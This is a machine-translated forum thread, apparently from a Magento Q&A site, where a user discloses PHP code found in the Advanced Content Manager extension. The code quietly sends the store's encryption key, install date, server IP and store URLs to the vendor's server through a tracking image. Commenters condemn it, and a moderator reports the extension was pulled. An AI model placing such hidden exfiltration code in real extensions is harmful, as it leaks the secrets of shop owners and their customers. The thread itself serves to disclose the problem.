내 무지를 용서하지만 암호 키는 마 젠토 데이터를 해독하는 데 사용됩니다. 모듈이 이것에 액세스 할만한 이유가 있습니까? Advanced Content Manager를 설치 한 후이 코드를 우연히 발견했습니다 ...
<div id="banana-tracker">
<?php
$stores = Mage::app()->getStores();
$key = (string)Mage::getConfig()->getNode('global/crypt/key');
$date = (string)Mage::getConfig()->getNode('global/install/date');
$serverIp = $_SERVER['SERVER_ADDR'];
$params = 'key='.$key.'&date='.$date.'&';
foreach($stores as $store)
{
$params .= 'store_'.$store->getCode().'='.urlencode(Mage::app()->getStore($store->getId())->getBaseUrl(Mage_Core_Model_Store::URL_TYPE_LINK)).'&';
}
?>
<img src="http://www.advancedcontentmanager.com/images/distant/banana-tracker.gif?<?php echo $params; ?>time=<?php echo time(); ?>&serverip=<?php echo $serverIp; ?>" />
3
이. 입니다. 끔찍 해요 암호화 키를 유출 할 이유가 없습니다.
—
Fabian Blechschmidt
이것은 나쁘다, 매우 나쁘다.
—
Anna Völkl
좋은 캐치! 이것은 매우 나쁘다 ...
—
Sander Mangel
알려 주셔서 감사합니다. Connect에서 제거되었습니다.
—
benmarks
@benmarks는 기쁘다. 앱이 매우 인상적이며 개발자가 과거에 매우 도움이되고 빠르기 때문에 명백한 이유 때문에 매우 실망합니다.
—
TylersSN